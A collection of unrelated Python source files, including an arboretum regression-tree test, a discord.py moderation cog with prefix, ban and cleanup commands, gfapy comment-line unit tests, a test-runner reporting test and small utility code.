import arboretum import numpy as np from sklearn.datasets import load_boston import json import pytest import utils @pytest.mark.parametrize("double_precision", [True, False]) @pytest.mark.parametrize("method", ['hist', 'exact']) @pytest.mark.parametrize("hist_size", [12, 15, 16, 31, 32, 63, 64, 127, 128, 255, 256, 511, 512, 1023]) def test_single_tree(double_precision, method, hist_size, y_pred=[[21.833334, 21.833334, 33.25, 33.25, 33.25, 33.25, 21.833334, 21.833334, 21.833334, 21.833334]]): boston = load_boston() n = 10 data = arboretum.DMatrix(boston.data[0:n], y=boston.target[0:n]) y = boston.target[0:n] model = arboretum.ArboretumRegression(max_depth=1, learning_rate=0.99999, n_estimators=1, verbosity=0, gamma_absolute=0.0, gamma_relative=0.0, min_child_weight=1.0, min_leaf_size=1, max_leaf_weight=0, colsample_bytree=1.0, colsample_bylevel=1.0, l1=0, l2=0, scale_pos_weight=1.0, initial_y=0.5, seed=0, double_precision=double_precision, method=method, hist_size=hist_size) model.fit(data, y) pred = model.predict(data) print(pred) print(y_pred) assert np.allclose(pred, y_pred)
11571167
from validation import vworkspace with vworkspace() as w: w.props.memory_effects_only = False w.fun.main.validate_phases("privatize_module", "internalize_parallel_code", "localize_declaration");
11571186
import discord from discord.ext import commands import asyncio import utils class Moderation(metaclass=utils.MetaCog, colour=0xffd0b5, thumbnail='https://i.imgur.com/QJiga6E.png'): """Nothing like a good spanking! These commands should give your mods a good feeling inside. Most of these commands require, [Manage Sever] permissions. """ def __init__(self, bot): self.bot = bot async def __local_check(self, ctx): if ctx.invoked_with == 'help': return True if not ctx.guild: raise commands.NoPrivateMessage return True async def __error(self, ctx, error): if isinstance(error, commands.NoPrivateMessage): try: await ctx.send('This command can not be used in DMs.') except discord.HTTPException: pass elif isinstance(error, commands.MissingRequiredArgument): await ctx.send(f'`{error.param.name}` is a required argument which is missing.') @commands.command(name='prefix', cls=utils.AbstractorGroup, abstractors=['add', 'remove', 'list']) async def prefix(self, ctx): """Prefix related commands. <This Group implements Base Commands> !Base commands are also sub commands! Base Commands --------------- add remove list Examples ---------- <prefix>prefix add <custom_prefix> <prefix>remove prefix <custom_prefix> {ctx.prefix}prefix list {ctx.prefix}prefix remove "eviee pls " """ @prefix.command(name='add') @commands.has_permissions(manage_guild=True) async def add_prefix(self, ctx, *, prefix: str): """Assign a Prefix to Eviee for use in your guild. Examples ---------- <prefix>prefix add <custom_prefix> <prefix>add prefix <custom_prefix> {ctx.prefix}add prefix "eviee pls " {ctx.prefix}prefix add ?! """ lru = self.bot.lru_prefix[ctx.guild.id] prefix = prefix.strip('"').strip("'") if len(prefix) > 50: return await ctx.error(info='The prefix can not be over 50 characters long. Please try again.') if prefix in lru: return await ctx.error(info=f'`"{prefix}"` is already an assigned prefix.') async with self.bot.pool.acquire() as conn: await conn.execute("""UPDATE guilds SET prefixes = prefixes || $1::text WHERE id IN ($2)""", prefix, ctx.guild.id) lru.append(prefix) await ctx.send(f'The prefix `"{prefix}"` has successfully been added.') @prefix.command(name='remove') async def remove_prefix(self, ctx, *, prefix: str): """Remove a Prefix from Eviee currently being used in your guild. Examples ---------- <prefix>prefix remove <custom_prefix> <prefix>remove prefix <custom_prefix> {ctx.prefix}remove prefix "eviee pls " {ctx.prefix}prefix remove ?! """ lru = self.bot.lru_prefix[ctx.guild.id] prefix = prefix.strip('"').strip("'") if prefix not in lru: return await ctx.error(info=f'`"{prefix}"` is not currently assigned to me.') lru.remove(prefix) await self.bot.pool.execute("""UPDATE guilds SET prefixes = array_remove(prefixes, $1::text) WHERE id IN ($2)""", prefix, ctx.guild.id) await ctx.send(f'Successfully removed `"{prefix}"` from my assigned prefixes.') @prefix.command(name='list') async def list_prefix(self, ctx): """List the available prefixes for your guild. Examples ---------- <prefix>prefix list <prefix>list prefix {ctx.prefix}prefix list {ctx.prefix}list prefix """ await ctx.paginate(title=f'Prefixes for {ctx.guild.name}', entries=self.bot.lru_prefix[ctx.guild.id], fmt='`"', footer='You may also mention me.') @commands.command(name='prefixes', cls=utils.EvieeCommand) async def _prefixes(self, ctx): """An alias to `prefix list`. Examples ---------- <prefix>prefixes {ctx.prefix}prefixes """ await ctx.paginate(title=f'Prefixes for {ctx.guild.name}', entries=self.bot.lru_prefix[ctx.guild.id], fmt='`"', footer='You may also mention me.') @commands.command(name='ban', cls=utils.EvieeCommand) @commands.bot_has_permissions(ban_members=True) @commands.has_permissions(ban_members=True) async def do_ban(self, ctx, member: discord.Member, *, reason: str=None): """Ban a member from your guild. Parameters ------------ member: [Required] The member you wish to ban. This could be either a name, mention or ID. reason: str [Optional] Provide a reason for banning the member. Examples ---------- <prefix>ban <member> <reason> {ctx.prefix}ban Noob For being a noob. {ctx.prefix}ban @Noob """ dn = str(member) try: await ctx.guild.ban(member, reason=reason) except discord.HTTPException: return await ctx.send(f'Banning `{dn}` has failed. Please try again.') await ctx.send(f'Successfully banned: **`{dn}`**') @commands.command(name='softban', cls=utils.EvieeCommand, aliases=['sb']) @commands.bot_has_permissions(ban_members=True) @commands.has_permissions(ban_members=True) async def do_softban(self, ctx, member: discord.Member, *, reason: str=None): """Soft-Ban a member from your guild. Soft bans are similar to kicks, but unlike kicks, messages from the user will also be removed. Aliases --------- sb Parameters ------------ member: [Required] The member you wish to soft-ban. This could be either a name, mention or ID. reason: str [Optional] Provide a reason for banning the member. Examples ---------- <prefix>softban <member> <reason> {ctx.prefix}softban Noob For being a noob. {ctx.prefix}sb @Noob """ dn = str(member) try: await ctx.guild.ban(member, reason=reason) await asyncio.sleep(1) await ctx.guild.unban(member, reason=f'Softban - {str(ctx.author)}') except discord.HTTPException: return await ctx.send(f'Soft-Banning `{dn}` has failed. Please try again.') await ctx.send(f'Successfully Soft-Banned: **`{dn}`**', delete_after=10) @commands.command(name='cleanup', cls=utils.EvieeCommand) @commands.has_permissions(manage_messages=True) async def do_cleanup(self, ctx, limit: int=20): """Cleanup a bot sessions messages. !Manage Messages is required to run this command fully! Parameters ------------ limit: int [Optional] The max amount of messages to try and clean. This defaults to 20. Examples ---------- <prefix>cleanup <limit> {ctx.prefix}cleanup 30 {ctx.prefix}cleanup """ messages = [] perms = await ctx.hasperms(member=ctx.guild.me, manage_messages=True) controllers = [e.controller_message.id for e in self.bot.get_cog('Music').queues.values()] async for message in ctx.channel.history(limit=limit): if message.id in controllers: continue if message.content.startswith(ctx.prefix) and perms: messages.append(message) elif message.author == ctx.guild.me: messages.append(message) if not messages: return await ctx.send('No messages to delete...') if not perms: for i, m in enumerate(messages): if i == 10: break await m.delete() else: await ctx.channel.delete_messages(messages) botm = len([m for m in messages if m.author == ctx.guild.me]) userm = len(messages) - botm embed = discord.Embed(title='Cleanup', description=f'Removed **{len(messages)}** messages successfully.', colour=0xffd4d4) if not perms: embed.add_field(name='Missing Permissions', value='Could not delete any user messages due to missing' ' **Manage Messages** permissions.') embed.set_footer(text=f'User Messages - {userm} | Bot Messages - {botm}') await ctx.send(embed=embed, delete_after=30) @do_cleanup.error async def do_cleanup_error(self, ctx, error): if isinstance(error, commands.MissingPermissions): await ctx.send('Manage Messages is required to run this command.') @do_ban.error @do_softban.error async def do_ban_error(self, ctx, error): if isinstance(error, commands.BadArgument): await ctx.send(f'{error}') elif isinstance(error, commands.MissingPermissions): await ctx.send('Ban Members is required to run this command.') elif isinstance(error, commands.BotMissingPermissions): await ctx.send('I require the Ban Members permission.') async def on_guild_join(self, guild): chan = self.bot.get_channel(486156641566457856) await chan.send(f'❤ - **{guild.name}**({guild.id}) | Members: {guild.member_count}') async def on_guild_remove(self, guild): chan = self.bot.get_channel(486156641566457856) await chan.send(f'💔 - **{guild.name}**({guild.id}) | Members: {guild.member_count}')
11571247
from typing import Optional class ColumboException(Exception): """Base exception for exceptions raised by Columbo""" class DuplicateQuestionNameException(ColumboException): """Multiple questions use the same name.""" class CliException(ColumboException): """An error occurred while processing command line arguments.""" @classmethod def invalid_value( cls, value: str, argument_name: str, error_message: Optional[str] = None ) -> "CliException": formatted_error_message = f": {error_message}" if error_message else "" return cls( f"'{value}' is not a valid value for '{argument_name}'{formatted_error_message}" )
11571252
import unittest import gfapy class TestApiComments(unittest.TestCase): def test_initialize(self): l = gfapy.line.Comment("# hallo") self.assertEqual("# hallo", str(l)) l = gfapy.line.Comment(["#", "hallo", "\t"]) self.assertEqual("#\thallo", str(l)) def test_fields(self): l = gfapy.line.Comment("# hallo") self.assertEqual("hallo", l.content) self.assertEqual(" ", l.spacer) l.content = "hello" self.assertEqual("hello", l.content) self.assertEqual("# hello", str(l)) l.spacer = " " self.assertEqual("hello", l.content) self.assertEqual("# hello", str(l)) def test_validation(self): with self.assertRaises(gfapy.FormatError): gfapy.line.Comment(["#", "hallo\nhallo"]) with self.assertRaises(gfapy.FormatError): gfapy.line.Comment(["#", "hallo", "\n"]) gfapy.line.Comment(["#", "hallo", "\n"], vlevel=0) # nothing raised l = gfapy.line.Comment(["#", "hallo"]) l.content = "hallo\n" # nothing raised with self.assertRaises(gfapy.FormatError): str(l) l.content = "hallo" str(l) # nothing raised l.spacer = "\n" # nothing raised with self.assertRaises(gfapy.FormatError): str(l) l = gfapy.line.Comment(["#", "hallo"], vlevel=3) with self.assertRaises(gfapy.FormatError): l.content = "hallo\n" with self.assertRaises(gfapy.FormatError): l.spacer = "\n" def test_from_string(self): s = "# this is a comment" l = gfapy.Line(s) self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual(s[2:], l.content) self.assertEqual(" ", l.spacer) s = "#this is another comment" l = gfapy.Line(s) self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual(s[1:], l.content) self.assertEqual("", l.spacer) s = "#\t and this too" l = gfapy.Line(s) self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual(s[3:], l.content) self.assertEqual(s[1:3], l.spacer) s = "#: and this too" l = gfapy.Line(s) self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual(s[1:], l.content) self.assertEqual("", l.spacer) def test_to_s(self): s = "# this is a comment" l = gfapy.Line(s) self.assertEqual(s, str(l)) s = "#this is another\tcomment" l = gfapy.Line(s) self.assertEqual(s, str(l)) s = "#this is another\tcomment" l = gfapy.Line(s) l.spacer = " " self.assertEqual("# "+s[1:], str(l)) def test_tags(self): with self.assertRaises(gfapy.ValueError): gfapy.line.Comment(["#", "hallo", " ", "zz:Z:hallo"]) l = gfapy.Line("# hallo zz:Z:hallo") self.assertEqual("hallo zz:Z:hallo", l.content) self.assertEqual(None, l.zz) with self.assertRaises(gfapy.RuntimeError): l.zz = 1 with self.assertRaises(gfapy.RuntimeError): l.set("zz", 1) self.assertEqual(None, l.get("zz")) def test_to_gfa1(self): s = "# this is a comment" l = gfapy.Line(s,version="gfa2") self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual("gfa2", l.version) self.assertEqual(s, str(l)) self.assertEqual("gfa2", l.to_gfa2().version) self.assertEqual(s, str(l.to_gfa2())) self.assertEqual("gfa1", l.to_gfa1().version) self.assertEqual(s, str(l.to_gfa1())) def test_to_gfa2(self): s = "# this is a comment" l = gfapy.Line(s,version="gfa1") self.assertEqual(gfapy.line.Comment, l.__class__) self.assertEqual("gfa1", l.version) self.assertEqual(s, str(l)) self.assertEqual("gfa1", l.to_gfa1().version) self.assertEqual(s, str(l.to_gfa1())) self.assertEqual("gfa2", l.to_gfa2().version) self.assertEqual(s, str(l.to_gfa2())) def test_rgfa_comments(self): gfa = gfapy.Gfa() c1 = "#this is a comment" c2 = "# this is also a comment" c3 = "#and \tthis too!" gfa.add_line(c1) # nothing raised gfa.add_line(c2) # nothing raised gfa.add_line(c3) # nothing raised self.assertEqual([c1,c2,c3], [str(x) for x in gfa.comments]) self.assertEqual(c1, str(gfa.comments[0])) gfa.rm(gfa.comments[0]) self.assertEqual([c2,c3], [str(x) for x in gfa.comments]) gfa.comments[0].disconnect() self.assertEqual([c3], [str(x) for x in gfa.comments])
11571267
import sys import time sys.path.insert(1, __file__.split("tests")[0]) from test_junkie.runner import Runner from tests.junkie_suites.Reporting import LoginSessions, Login, Dashboard def test_reporting(): f = __file__.replace("test_reporting.py", "test_{}".format(int(time.time()))) html = "{}.html".format(f) xml = "{}.xml".format(f) runner = Runner([Login, LoginSessions, Dashboard], monitor_resources=True, html_report=html, xml_report=xml) runner.run() suites = runner.get_executed_suites() for suite in suites: suite.metrics.get_average_performance_of_after_class() suite.metrics.get_average_performance_of_before_class() suite.metrics.get_average_performance_of_after_test() suite.metrics.get_average_performance_of_before_test()
11571318
from itertools import tee, izip, chain def cycle_pairs(iterable): """ Cycles through the given iterable, returning an iterator which returns the current and the next item. When reaching the end it returns the last and the first item. """ first, last = iterable[0], iterable[-1] a, b = tee(iterable) iter(b).next() return chain(izip(a, b), [(last, first)])